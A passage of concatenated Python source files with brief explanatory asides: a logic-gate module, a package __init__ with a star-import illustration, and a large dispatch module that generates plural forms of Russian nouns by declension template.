"load_toml",
"load_yaml",
]
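This `__init__` pairs its re-exports with an explicit `__all__`, which is what controls star-imports from the package. A small self-contained illustration of that mechanism, built on a throwaway in-memory module rather than pyzzy itself:

```python
import sys
import types

# Throwaway module with two public names, one private name, and an
# explicit __all__ -- the same shape as the __init__ above.
mod = types.ModuleType("demo_reexports")
exec(
    "def load():\n"
    "    return 'loaded'\n"
    "def dump():\n"
    "    return 'dumped'\n"
    "_internal = 42\n"
    "__all__ = ['load', 'dump']\n",
    mod.__dict__,
)
sys.modules["demo_reexports"] = mod

ns = {}
exec("from demo_reexports import *", ns)
public = {k for k in ns if not k.startswith("__")}
assert public == {"load", "dump"}  # _internal did not leak through the star-import
```

Without `__all__`, a star-import would instead pull in every non-underscore name, so listing the exports keeps the package surface deliberate.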
# File: gatepy/__init__.py (repo: MrNereof/gatepy, license: MIT)

def NOT(a: bool) -> bool:
"""NOT logical gate
Args:
a (bool): Input signal
Returns:
bool: Output signal
"""
return not a
def OR(a: bool, b: bool) -> bool:
"""OR logical gate
Args:
a (bool): First input signal
b (bool): Second input signal
Returns:
bool: Output signal
"""
return a or b
def AND(a: bool, b: bool) -> bool:
"""AND logical gate
Args:
a (bool): First input signal
b (bool): Second input signal
Returns:
bool: Output signal
"""
return a and b
def NAND(a: bool, b: bool) -> bool:
"""NAND logical gate
Args:
a (bool): First input signal
b (bool): Second input signal
Returns:
bool: Output signal
"""
return NOT(AND(a, b))
def NOR(a: bool, b: bool) -> bool:
"""NOR logical gate
Args:
a (bool): First input signal
b (bool): Second input signal
Returns:
bool: Output signal
"""
return NOT(OR(a, b))
def XOR(a: bool, b: bool) -> bool:
"""XOR logical gate
Args:
a (bool): First input signal
b (bool): Second input signal
Returns:
bool: Output signal
"""
return OR(AND(NOT(a), b), AND(a, NOT(b)))
def XNOR(a: bool, b: bool) -> bool:
"""XNOR logical gate
Args:
a (bool): First input signal
b (bool): Second input signal
Returns:
bool: Output signal
"""
return NOT(XOR(a, b))
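Because XOR and AND are already defined, these gates compose directly into arithmetic circuits. A sketch of a half adder built from them (the `half_adder` helper is ours; the gate bodies mirror the definitions above so the example runs standalone):

```python
def NOT(a: bool) -> bool:
    return not a

def OR(a: bool, b: bool) -> bool:
    return a or b

def AND(a: bool, b: bool) -> bool:
    return a and b

def XOR(a: bool, b: bool) -> bool:
    return OR(AND(NOT(a), b), AND(a, NOT(b)))

def half_adder(a: bool, b: bool):
    """Single-bit addition: sum bit is XOR, carry bit is AND."""
    return XOR(a, b), AND(a, b)

# Exhaustive truth table.
assert half_adder(False, False) == (False, False)
assert half_adder(True, False) == (True, False)
assert half_adder(False, True) == (True, False)
assert half_adder(True, True) == (False, True)   # 1 + 1 = 0, carry 1
```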
# File: integration_tests/test-packages/python/pythonspecific/pythonspecific/mod_one/__init__.py (repo: franklinen/doppel-cli, license: BSD-3-Clause)

# flake8: noqa
from .some_function import some_function
from .SomeClass import SomeClass
from .SomeClass import SOME_CONSTANT
from .wrap_min import wrap_min
from .wrap_min import MinWrapper
# File: BS/tmpl_nouns_plurl.py (repo: Aleksey-Voko/Word_forms_bases, license: MIT)

# Nouns, plural forms
from BS.word_form import WordForm
def get_plurl_word_forms(src_dict, singl_word_forms) -> list:
plurls = {
'I1': get_plurl_i1,
'I1*': get_plurl_i1_prim,
'I1&IV11': get_plurl_i1_and_iv11,
'I10': get_plurl_i10,
'I11': get_plurl_i11,
'I13е**': get_plurl_i13e2_prim,
'I13о': get_plurl_i13o,
'I16': get_plurl_i16,
'I16*': get_plurl_i16_prim,
'I16#е': get_plurl_i16sharp_e,
'I16#е*': get_plurl_i16sharp_e_prim,
'I16е': get_plurl_i16e,
'I16е*': get_plurl_i16e_prim,
'I16е*-': get_plurl_i16e_prim__,
'I16о': get_plurl_i16o,
'I16о*': get_plurl_i16o_prim,
'I17#е': get_plurl_i17sharp_e,
'I19': get_plurl_i19,
'I2': get_plurl_i2,
'I2*': get_plurl_i2_prim,
'I3': get_plurl_i3,
'I3*': get_plurl_i3_prim,
'I4': get_plurl_i4,
'I4*': get_plurl_i4_prim,
'I4+III7': get_plurl_i4_and_iii7,
'I6': get_plurl_i6,
'II1': get_plurl_ii1,
'II1*': get_plurl_ii1_prim,
'II1*+6*': get_plurl_ii1_prim_and_6_prim,
'II1+IV1': get_plurl_ii1_and_iv1,
'II3': get_plurl_ii3,
'II6': get_plurl_ii6,
'II6*': get_plurl_ii6_prim,
'III12': get_plurl_iii12,
'III2*': get_plurl_iii2_prim,
'III7': get_plurl_iii7,
'III7*': get_plurl_iii7_prim,
'IV1': get_plurl_iv1,
'IV1+I1': get_plurl_iv1_and_i1,
'IV12': get_plurl_iv12,
'IV13': get_plurl_iv13,
'IV6': get_plurl_iv6,
'IV6*': get_plurl_iv6_prim,
'IV6*+I13*': get_plurl_iv6_prim_and_i13,
'IV6*+II5*': get_plurl_iv6_prim_and_ii5_prim,
'IV6+I13': get_plurl_iv6_and_i13,
'V2': get_plurl_v2,
}
return plurls[src_dict['Inf_6']](src_dict['name'], src_dict['Inf_0'], singl_word_forms)
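`get_plurl_word_forms` is a plain dispatch table: the template code in `src_dict['Inf_6']` selects one declension handler, and every handler shares the `(name, inf_0, singular_forms)` calling shape. A stripped-down sketch of the same pattern, with a toy handler and a namedtuple stand-in for `BS.word_form.WordForm` (not one of the real paradigms):

```python
from collections import namedtuple

# Stand-in for BS.word_form.WordForm: a name plus a form identifier.
WordForm = namedtuple("WordForm", ["name", "idf"])

def paradigm_a(name, inf_0, singular_forms):
    # Toy handler: animate nouns ('Inf_0' != 'неод') reuse the genitive
    # for the accusative, mirroring the branching in the handlers below.
    gen = WordForm(name + "-gen", ".СмнР")
    acc = gen._replace(idf=".СмнВ") if inf_0 != "неод" else WordForm(name, ".СмнВ")
    return [WordForm(name, ".СмнИ"), gen, acc]

HANDLERS = {"A": paradigm_a}

def get_forms(src_dict, singular_forms):
    # Same shape as get_plurl_word_forms: look up by template code, then call.
    return HANDLERS[src_dict["Inf_6"]](src_dict["name"], src_dict["Inf_0"], singular_forms)

forms = get_forms({"name": "стол", "Inf_6": "A", "Inf_0": "неод"}, [])
assert [f.idf for f in forms] == [".СмнИ", ".СмнР", ".СмнВ"]
```

Keeping the handlers behind one uniform signature is what lets the table stay a flat dict instead of a long if/elif chain over template codes.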
# I1
def get_plurl_i1(_, inf_0: str, singl_word_forms: list) -> list:
ser = list(filter(lambda x: x.idf == '.СеР', singl_word_forms))[0].name
if inf_0 == 'неод':
smnv = f'{ser[:-1]}и'
else:
smnv = f'{ser[:-1]}ов'
word_forms = [
WordForm(f'{ser[:-1]}и', '.СмнИ'),
WordForm(f'{ser[:-1]}ов', '.СмнР'),
WordForm(f'{ser[:-1]}ам', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{ser[:-1]}ами', '.СмнТ'),
WordForm(f'{ser[:-1]}ах', '.СмнП'),
]
return word_forms
# I1*
def get_plurl_i1_prim(name: str, inf_0: str, _) -> list:
if inf_0 == 'неод':
smnv = f'{name}'
else:
smnv = f'{name[:-1]}ов'
word_forms = [
WordForm(f'{name}', '.СмнИ'),
WordForm(f'{name[:-1]}ов', '.СмнР'),
WordForm(f'{name[:-1]}ам', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{name[:-1]}ами', '.СмнТ'),
WordForm(f'{name[:-1]}ах', '.СмнП'),
]
return word_forms
# I1&IV11
def get_plurl_i1_and_iv11(name: str, _, singl_word_forms: list) -> list:
ser = list(filter(lambda x: x.idf == '.СеР', singl_word_forms))[0].name
word_forms = [
WordForm(f'{ser[:-1]}и', '.СмнИ1'),
WordForm(f'{name[:-2]}ята', '.СмнИ2'),
WordForm(f'{ser[:-1]}ов', '.СмнР1'),
WordForm(f'{name[:-2]}ят', '.СмнР2'),
WordForm(f'{ser[:-1]}ам', '.СмнД1'),
WordForm(f'{name[:-2]}ятам', '.СмнД2'),
WordForm(f'{ser[:-1]}ов', '.СмнВ1'),
WordForm(f'{name[:-2]}ят', '.СмнВ2'),
WordForm(f'{ser[:-1]}ами', '.СмнТ1'),
WordForm(f'{name[:-2]}ятами', '.СмнТ2'),
WordForm(f'{ser[:-1]}ах', '.СмнП1'),
WordForm(f'{name[:-2]}ятах', '.СмнП2'),
]
return word_forms
# I10
def get_plurl_i10(_, inf_0: str, singl_word_forms: list) -> list:
ser = list(filter(lambda x: x.idf == '.СеР', singl_word_forms))[0].name
if inf_0 == 'неод':
smnv = f'{ser}'
else:
smnv = f'{ser[:-2]}ий'
word_forms = [
WordForm(f'{ser}', '.СмнИ'),
WordForm(f'{ser[:-2]}ий', '.СмнР'),
WordForm(f'{ser[:-1]}ям', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{ser[:-1]}ями', '.СмнТ'),
WordForm(f'{ser[:-1]}ях', '.СмнП'),
]
return word_forms
# I11
def get_plurl_i11(_, inf_0: str, singl_word_forms: list) -> list:
ser = list(filter(lambda x: x.idf == '.СеР', singl_word_forms))[0].name
if inf_0 == 'неод':
smnv = f'{ser}'
else:
smnv = f'{ser[:-1]}й'
word_forms = [
WordForm(f'{ser}', '.СмнИ'),
WordForm(f'{ser[:-1]}й', '.СмнР'),
WordForm(f'{ser[:-1]}ям', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{ser[:-1]}ями', '.СмнТ'),
WordForm(f'{ser[:-1]}ях', '.СмнП'),
]
return word_forms
# I13е**
def get_plurl_i13e2_prim(_, __, singl_word_forms: list) -> list:
ser2 = list(filter(lambda x: x.idf == '.СеР2', singl_word_forms))[0].name
word_forms = [
WordForm(f'{ser2[:-1]}и', '.СмнИ'),
WordForm(f'{ser2[:-2]}е{ser2[-2]}', '.СмнР'),
WordForm(f'{ser2[:-1]}ам', '.СмнД'),
WordForm(f'{ser2[:-1]}и', '.СмнВ'),
WordForm(f'{ser2[:-1]}ами', '.СмнТ'),
WordForm(f'{ser2[:-1]}ах', '.СмнП'),
]
return word_forms
# I13о
def get_plurl_i13o(_, inf_0: str, singl_word_forms: list) -> list:
ser = list(filter(lambda x: x.idf == '.СеР', singl_word_forms))[0].name
if inf_0 == 'неод':
smnv = f'{ser[:-1]}и'
else:
smnv = f'{ser[:-2]}о{ser[-2]}'
word_forms = [
WordForm(f'{ser[:-1]}и', '.СмнИ'),
WordForm(f'{ser[:-2]}о{ser[-2]}', '.СмнР'),
WordForm(f'{ser[:-1]}ам', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{ser[:-1]}ами', '.СмнТ'),
WordForm(f'{ser[:-1]}ах', '.СмнП'),
]
return word_forms
# I16
def get_plurl_i16(_, inf_0: str, singl_word_forms: list) -> list:
ser = list(filter(lambda x: x.idf == '.СеР', singl_word_forms))[0].name
if inf_0 == 'неод':
smnv = f'{ser}'
else:
smnv = f'{ser[:-1]}'
word_forms = [
WordForm(f'{ser}', '.СмнИ'),
WordForm(f'{ser[:-1]}', '.СмнР'),
WordForm(f'{ser[:-1]}ам', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{ser[:-1]}ами', '.СмнТ'),
WordForm(f'{ser[:-1]}ах', '.СмнП'),
]
return word_forms
# I16*
def get_plurl_i16_prim(name: str, inf_0: str, _) -> list:
if inf_0 == 'неод':
smnv = f'{name}'
else:
smnv = f'{name[:-1]}'
word_forms = [
WordForm(f'{name}', '.СмнИ'),
WordForm(f'{name[:-1]}', '.СмнР'),
WordForm(f'{name[:-1]}ам', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{name[:-1]}ами', '.СмнТ'),
WordForm(f'{name[:-1]}ах', '.СмнП'),
]
return word_forms
# I16#е
def get_plurl_i16sharp_e(_, inf_0: str, singl_word_forms: list) -> list:
ser = list(filter(lambda x: x.idf == '.СеР', singl_word_forms))[0].name
if inf_0 == 'неод':
smnv = f'{ser}'
else:
smnv = f'{ser[:-3]}е{ser[-2:-1]}'
word_forms = [
WordForm(f'{ser}', '.СмнИ'),
WordForm(f'{ser[:-3]}е{ser[-2:-1]}', '.СмнР'),
WordForm(f'{ser[:-1]}ам', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{ser[:-1]}ами', '.СмнТ'),
WordForm(f'{ser[:-1]}ах', '.СмнП'),
]
return word_forms
# I16#е*
def get_plurl_i16sharp_e_prim(name: str, inf_0: str, _) -> list:
if inf_0 == 'неод':
smnv = f'{name}'
else:
smnv = f'{name[:-3]}е{name[-2:-1]}'
word_forms = [
WordForm(f'{name}', '.СмнИ'),
WordForm(f'{name[:-3]}е{name[-2:-1]}', '.СмнР'),
WordForm(f'{name[:-1]}ам', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{name[:-1]}ами', '.СмнТ'),
WordForm(f'{name[:-1]}ах', '.СмнП'),
]
return word_forms
# I16е
def get_plurl_i16e(_, inf_0: str, singl_word_forms: list) -> list:
ser = list(filter(lambda x: x.idf == '.СеР', singl_word_forms))[0].name
if inf_0 == 'неод':
smnv = f'{ser}'
else:
smnv = f'{ser[:-2]}е{ser[-2]}'
word_forms = [
WordForm(f'{ser}', '.СмнИ'),
WordForm(f'{ser[:-2]}е{ser[-2]}', '.СмнР'),
WordForm(f'{ser[:-1]}ам', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{ser[:-1]}ами', '.СмнТ'),
WordForm(f'{ser[:-1]}ах', '.СмнП'),
]
return word_forms
# I16е*
def get_plurl_i16e_prim(name: str, inf_0: str, _) -> list:
if inf_0 == 'неод':
smnv = f'{name}'
else:
smnv = f'{name[:-2]}е{name[-2]}'
word_forms = [
WordForm(f'{name}', '.СмнИ'),
WordForm(f'{name[:-2]}е{name[-2]}', '.СмнР'),
WordForm(f'{name[:-1]}ам', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{name[:-1]}ами', '.СмнТ'),
WordForm(f'{name[:-1]}ах', '.СмнП'),
]
return word_forms
# I16е*-
def get_plurl_i16e_prim__(name: str, _, __) -> list:
word_forms = [
WordForm(f'{name}', '.СмнИ'),
WordForm(f'{name[:-2]}е{name[-2]}', '.СмнР'),
WordForm(f'{name}', '.СмнВ'),
WordForm(f'{name[:-1]}ах', '.СмнП'),
]
return word_forms
# I16о
def get_plurl_i16o(_, inf_0: str, singl_word_forms: list) -> list:
ser = list(filter(lambda x: x.idf == '.СеР', singl_word_forms))[0].name
if inf_0 == 'неод':
smnv = f'{ser}'
else:
smnv = f'{ser[:-2]}о{ser[-2]}'
word_forms = [
WordForm(f'{ser}', '.СмнИ'),
WordForm(f'{ser[:-2]}о{ser[-2]}', '.СмнР'),
WordForm(f'{ser[:-1]}ам', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{ser[:-1]}ами', '.СмнТ'),
WordForm(f'{ser[:-1]}ах', '.СмнП'),
]
return word_forms
# I16о*
def get_plurl_i16o_prim(name: str, inf_0: str, _) -> list:
if inf_0 == 'неод':
smnv = f'{name}'
else:
smnv = f'{name[:-2]}о{name[-2]}'
word_forms = [
WordForm(f'{name}', '.СмнИ'),
WordForm(f'{name[:-2]}о{name[-2]}', '.СмнР'),
WordForm(f'{name[:-1]}ам', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{name[:-1]}ами', '.СмнТ'),
WordForm(f'{name[:-1]}ах', '.СмнП'),
]
return word_forms
# I17#е
def get_plurl_i17sharp_e(_, __, singl_word_forms: list) -> list:
ser = list(filter(lambda x: x.idf == '.СеР', singl_word_forms))[0].name
word_forms = [
WordForm(f'{ser}', '.СмнИ'),
WordForm(f'{ser[:-3]}е{ser[-2:-1]}', '.СмнР'),
WordForm(f'{ser[:-1]}ям', '.СмнД'),
WordForm(f'{ser}', '.СмнВ'),
WordForm(f'{ser[:-1]}ями', '.СмнТ'),
WordForm(f'{ser[:-1]}ях', '.СмнП'),
]
return word_forms
# I19
def get_plurl_i19(_, inf_0: str, singl_word_forms: list) -> list:
ser = list(filter(lambda x: x.idf == '.СеР', singl_word_forms))[0].name
if inf_0 == 'неод':
smnv = f'{ser}'
else:
smnv = f'{ser[:-1]}ь'
word_forms = [
WordForm(f'{ser}', '.СмнИ'),
WordForm(f'{ser[:-1]}ь', '.СмнР'),
WordForm(f'{ser[:-1]}ям', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{ser[:-1]}ями', '.СмнТ'),
WordForm(f'{ser[:-1]}ях', '.СмнП'),
]
return word_forms
# I2
def get_plurl_i2(_, inf_0: str, singl_word_forms: list) -> list:
ser = list(filter(lambda x: x.idf == '.СеР', singl_word_forms))[0].name
if inf_0 == 'неод':
smnv = f'{ser[:-1]}и'
else:
smnv = f'{ser[:-1]}ев'
word_forms = [
WordForm(f'{ser[:-1]}и', '.СмнИ'),
WordForm(f'{ser[:-1]}ев', '.СмнР'),
WordForm(f'{ser[:-1]}ям', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{ser[:-1]}ями', '.СмнТ'),
WordForm(f'{ser[:-1]}ях', '.СмнП'),
]
return word_forms
# I2*
def get_plurl_i2_prim(name: str, inf_0: str, __) -> list:
if inf_0 == 'неод':
smnv = f'{name}'
else:
smnv = f'{name[:-1]}ев'
word_forms = [
WordForm(f'{name}', '.СмнИ'),
WordForm(f'{name[:-1]}ев', '.СмнР'),
WordForm(f'{name[:-1]}ям', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{name[:-1]}ями', '.СмнТ'),
WordForm(f'{name[:-1]}ях', '.СмнП'),
]
return word_forms
# I3
def get_plurl_i3(_, inf_0: str, singl_word_forms: list) -> list:
ser = list(filter(lambda x: x.idf == '.СеР', singl_word_forms))[0].name
if inf_0 == 'неод':
smnv = f'{ser[:-1]}и'
else:
smnv = f'{ser[:-1]}ей'
word_forms = [
WordForm(f'{ser[:-1]}и', '.СмнИ'),
WordForm(f'{ser[:-1]}ей', '.СмнР'),
WordForm(f'{ser[:-1]}ам', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{ser[:-1]}ами', '.СмнТ'),
WordForm(f'{ser[:-1]}ах', '.СмнП'),
]
return word_forms
# I3*
def get_plurl_i3_prim(name: str, inf_0: str, _) -> list:
if inf_0 == 'неод':
smnv = f'{name}'
else:
smnv = f'{name[:-1]}ей'
word_forms = [
WordForm(f'{name}', '.СмнИ'),
WordForm(f'{name[:-1]}ей', '.СмнР'),
WordForm(f'{name[:-1]}ам', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{name[:-1]}ами', '.СмнТ'),
WordForm(f'{name[:-1]}ах', '.СмнП'),
]
return word_forms
# I4
def get_plurl_i4(_, inf_0: str, singl_word_forms: list) -> list:
ser = list(filter(lambda x: x.idf == '.СеР', singl_word_forms))[0].name
if inf_0 == 'неод':
smnv = f'{ser[:-1]}и'
else:
smnv = f'{ser[:-1]}ей'
word_forms = [
WordForm(f'{ser[:-1]}и', '.СмнИ'),
WordForm(f'{ser[:-1]}ей', '.СмнР'),
WordForm(f'{ser[:-1]}ям', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{ser[:-1]}ями', '.СмнТ'),
WordForm(f'{ser[:-1]}ях', '.СмнП'),
]
return word_forms
# I4*
def get_plurl_i4_prim(name: str, inf_0: str, _) -> list:
if inf_0 == 'неод':
smnv = f'{name}'
else:
smnv = f'{name[:-1]}ей'
word_forms = [
WordForm(f'{name}', '.СмнИ'),
WordForm(f'{name[:-1]}ей', '.СмнР'),
WordForm(f'{name[:-1]}ям', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{name[:-1]}ями', '.СмнТ'),
WordForm(f'{name[:-1]}ях', '.СмнП'),
]
return word_forms
# I4+III7
def get_plurl_i4_and_iii7(_, inf_0: str, singl_word_forms: list) -> list:
ser = list(filter(lambda x: x.idf == '.СеР', singl_word_forms))[0].name
if inf_0 == 'неод':
smnv1 = WordForm(f'{ser[:-1]}и', '.СмнВ1')
smnv2 = WordForm(f'{ser}', '.СмнВ2')
smnv = ''
else:
smnv1 = ''
smnv2 = ''
smnv = WordForm(f'{ser[:-1]}и', '.СмнВ')
word_forms = [
WordForm(f'{ser[:-1]}и', '.СмнИ1'),
WordForm(f'{ser}', '.СмнИ2'),
WordForm(f'{ser[:-1]}ей', '.СмнР'),
WordForm(f'{ser[:-1]}ям', '.СмнД'),
smnv1,
smnv2,
smnv,
WordForm(f'{ser[:-1]}ями', '.СмнТ'),
WordForm(f'{ser[:-1]}ях', '.СмнП'),
]
return list(filter(None, word_forms))
# I6
def get_plurl_i6(_, inf_0: str, singl_word_forms: list) -> list:
ser = list(filter(lambda x: x.idf == '.СеР', singl_word_forms))[0].name
if inf_0 == 'неод':
smnv = f'{ser}'
else:
smnv = f'{ser[:-1]}ей'
word_forms = [
WordForm(f'{ser}', '.СмнИ'),
WordForm(f'{ser[:-1]}ей', '.СмнР'),
WordForm(f'{ser[:-1]}ям', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{ser[:-1]}ями', '.СмнТ'),
WordForm(f'{ser[:-1]}ях', '.СмнП'),
]
return word_forms
# II1
def get_plurl_ii1(_, inf_0: str, singl_word_forms: list) -> list:
ser = list(filter(lambda x: x.idf == '.СеР', singl_word_forms))[0].name
if inf_0 == 'неод':
smnv = f'{ser[:-1]}ы'
else:
smnv = f'{ser[:-1]}ов'
word_forms = [
WordForm(f'{ser[:-1]}ы', '.СмнИ'),
WordForm(f'{ser[:-1]}ов', '.СмнР'),
WordForm(f'{ser[:-1]}ам', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{ser[:-1]}ами', '.СмнТ'),
WordForm(f'{ser[:-1]}ах', '.СмнП'),
]
return word_forms
# II1*
def get_plurl_ii1_prim(name: str, inf_0: str, _) -> list:
if inf_0 == 'неод':
smnv = f'{name}'
else:
smnv = f'{name[:-1]}ов'
word_forms = [
WordForm(f'{name}', '.СмнИ'),
WordForm(f'{name[:-1]}ов', '.СмнР'),
WordForm(f'{name[:-1]}ам', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{name[:-1]}ами', '.СмнТ'),
WordForm(f'{name[:-1]}ах', '.СмнП'),
]
return word_forms
# II1*+6*
def get_plurl_ii1_prim_and_6_prim(name: str, _, __) -> list:
word_forms = [
WordForm(f'{name}', '.СмнИ'),
WordForm(f'{name[:-1]}ов', '.СмнР1'),
WordForm(f'{name[:-1]}', '.СмнР2'),
WordForm(f'{name[:-1]}ам', '.СмнД'),
WordForm(f'{name}', '.СмнВ'),
WordForm(f'{name[:-1]}ами', '.СмнТ'),
WordForm(f'{name[:-1]}ах', '.СмнП'),
]
return word_forms
# II1+IV1
def get_plurl_ii1_and_iv1(_, inf_0: str, singl_word_forms: list) -> list:
ser = list(filter(lambda x: x.idf == '.СеР', singl_word_forms))[0].name
if inf_0 == 'неод':
smnv1 = WordForm(f'{ser[:-1]}ы', '.СмнВ1')
smnv2 = WordForm(f'{ser}', '.СмнВ2')
smnv = ''
else:
smnv1 = ''
smnv2 = ''
smnv = WordForm(f'{ser[:-1]}ов', '.СмнВ3')
word_forms = [
WordForm(f'{ser[:-1]}ы', '.СмнИ1'),
WordForm(f'{ser}', '.СмнИ2'),
WordForm(f'{ser[:-1]}ов', '.СмнР'),
WordForm(f'{ser[:-1]}ам', '.СмнД'),
smnv1,
smnv2,
smnv,
WordForm(f'{ser[:-1]}ами', '.СмнТ'),
WordForm(f'{ser[:-1]}ах', '.СмнП'),
]
return list(filter(None, word_forms))
# II3
def get_plurl_ii3(_, inf_0: str, singl_word_forms: list) -> list:
ser = list(filter(lambda x: x.idf == '.СеР', singl_word_forms))[0].name
if inf_0 == 'неод':
smnv = f'{ser[:-1]}ы'
else:
smnv = f'{ser[:-1]}ев'
word_forms = [
WordForm(f'{ser[:-1]}ы', '.СмнИ'),
WordForm(f'{ser[:-1]}ев', '.СмнР'),
WordForm(f'{ser[:-1]}ам', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{ser[:-1]}ами', '.СмнТ'),
WordForm(f'{ser[:-1]}ах', '.СмнП'),
]
return word_forms
# II6
def get_plurl_ii6(_, inf_0: str, singl_word_forms: list) -> list:
ser = list(filter(lambda x: x.idf == '.СеР', singl_word_forms))[0].name
if inf_0 == 'неод':
smnv = f'{ser}'
else:
smnv = f'{ser[:-1]}'
word_forms = [
WordForm(f'{ser}', '.СмнИ'),
WordForm(f'{ser[:-1]}', '.СмнР'),
WordForm(f'{ser[:-1]}ам', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{ser[:-1]}ами', '.СмнТ'),
WordForm(f'{ser[:-1]}ах', '.СмнП'),
]
return word_forms
# II6*
def get_plurl_ii6_prim(name: str, inf_0: str, __) -> list:
if inf_0 == 'неод':
smnv = f'{name}'
else:
smnv = f'{name[:-1]}'
word_forms = [
WordForm(f'{name}', '.СмнИ'),
WordForm(f'{name[:-1]}', '.СмнР'),
WordForm(f'{name[:-1]}ам', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{name[:-1]}ами', '.СмнТ'),
WordForm(f'{name[:-1]}ах', '.СмнП'),
]
return word_forms
# III12
def get_plurl_iii12(_, __, singl_word_forms: list) -> list:
ser = list(filter(lambda x: x.idf == '.СеР', singl_word_forms))[0].name
word_forms = [
WordForm(f'{ser}', '.СмнИ'),
WordForm(f'{ser[:-2]}ий', '.СмнР'),
WordForm(f'{ser[:-1]}ям', '.СмнД'),
WordForm(f'{ser}', '.СмнВ'),
WordForm(f'{ser[:-1]}ями', '.СмнТ'),
WordForm(f'{ser[:-1]}ях', '.СмнП'),
]
return word_forms
# III2*
def get_plurl_iii2_prim(name: str, inf_0: str, _) -> list:
if inf_0 == 'неод':
smnv = f'{name}'
else:
smnv = f'{name[:-1]}ев'
word_forms = [
WordForm(f'{name}', '.СмнИ'),
WordForm(f'{name[:-1]}ев', '.СмнР'),
WordForm(f'{name[:-1]}ям', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{name[:-1]}ями', '.СмнТ'),
WordForm(f'{name[:-1]}ях', '.СмнП'),
]
return word_forms
# III7
def get_plurl_iii7(name, __, singl_word_forms: list) -> list:
ser = list(filter(lambda x: x.idf == '.СеР', singl_word_forms))[0].name
word_forms = [
WordForm(f'{ser}', '.СмнИ'),
WordForm(f'{name[:-1]}ей', '.СмнР'),
WordForm(f'{name[:-1]}ям', '.СмнД'),
WordForm(f'{name[:-1]}ей', '.СмнВ1'),
WordForm(f'{name[:-1]}ями', '.СмнТ'),
WordForm(f'{name[:-1]}ях', '.СмнП'),
]
return word_forms
# III7*
def get_plurl_iii7_prim(name: str, _, __) -> list:
word_forms = [
WordForm(f'{name}', '.СмнИ'),
WordForm(f'{name[:-1]}ей', '.СмнР'),
WordForm(f'{name[:-1]}ям', '.СмнД'),
WordForm(f'{name}', '.СмнВ'),
WordForm(f'{name[:-1]}ями', '.СмнТ'),
WordForm(f'{name[:-1]}ях', '.СмнП'),
]
return word_forms
# IV1
def get_plurl_iv1(_, inf_0: str, singl_word_forms: list) -> list:
ser = list(filter(lambda x: x.idf == '.СеР', singl_word_forms))[0].name
if inf_0 == 'неод':
smnv = f'{ser}'
else:
smnv = f'{ser[:-1]}ов'
word_forms = [
WordForm(f'{ser}', '.СмнИ'),
WordForm(f'{ser[:-1]}ов', '.СмнР'),
WordForm(f'{ser[:-1]}ам', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{ser[:-1]}ами', '.СмнТ'),
WordForm(f'{ser[:-1]}ах', '.СмнП'),
]
return word_forms
# IV1+I1
def get_plurl_iv1_and_i1(_, __, singl_word_forms: list) -> list:
ser = list(filter(lambda x: x.idf == '.СеР', singl_word_forms))[0].name
word_forms = [
WordForm(f'{ser}', '.СмнИ1'),
WordForm(f'{ser[:-1]}и', '.СмнИ2'),
WordForm(f'{ser[:-1]}ов', '.СмнР'),
WordForm(f'{ser[:-1]}ам', '.СмнД'),
WordForm(f'{ser}', '.СмнВ1'),
WordForm(f'{ser[:-1]}и', '.СмнВ2'),
WordForm(f'{ser[:-1]}ами', '.СмнТ'),
WordForm(f'{ser[:-1]}ах', '.СмнП'),
]
return word_forms
# IV12
def get_plurl_iv12(name: str, inf_0: str, _) -> list:
if inf_0 == 'неод':
smnv = f'{name[:-4]}ята'
else:
smnv = f'{name[:-4]}ят'
word_forms = [
WordForm(f'{name[:-4]}ята', '.СмнИ'),
WordForm(f'{name[:-4]}ят', '.СмнР'),
WordForm(f'{name[:-4]}ятам', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{name[:-4]}ятами', '.СмнТ'),
WordForm(f'{name[:-4]}ятах', '.СмнП'),
]
return word_forms
# IV13
def get_plurl_iv13(name: str, _, __) -> list:
word_forms = [
WordForm(f'{name[:-4]}ата', '.СмнИ'),
WordForm(f'{name[:-4]}ат', '.СмнР'),
WordForm(f'{name[:-4]}атам', '.СмнД'),
WordForm(f'{name[:-4]}ат', '.СмнВ'),
WordForm(f'{name[:-4]}атами', '.СмнТ'),
WordForm(f'{name[:-4]}атах', '.СмнП'),
]
return word_forms
# IV6
def get_plurl_iv6(_, inf_0: str, singl_word_forms: list) -> list:
ser = list(filter(lambda x: x.idf == '.СеР', singl_word_forms))[0].name
if inf_0 == 'неод':
smnv = f'{ser}'
else:
smnv = f'{ser[:-1]}'
word_forms = [
WordForm(f'{ser}', '.СмнИ'),
WordForm(f'{ser[:-1]}', '.СмнР'),
WordForm(f'{ser[:-1]}ам', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{ser[:-1]}ами', '.СмнТ'),
WordForm(f'{ser[:-1]}ах', '.СмнП'),
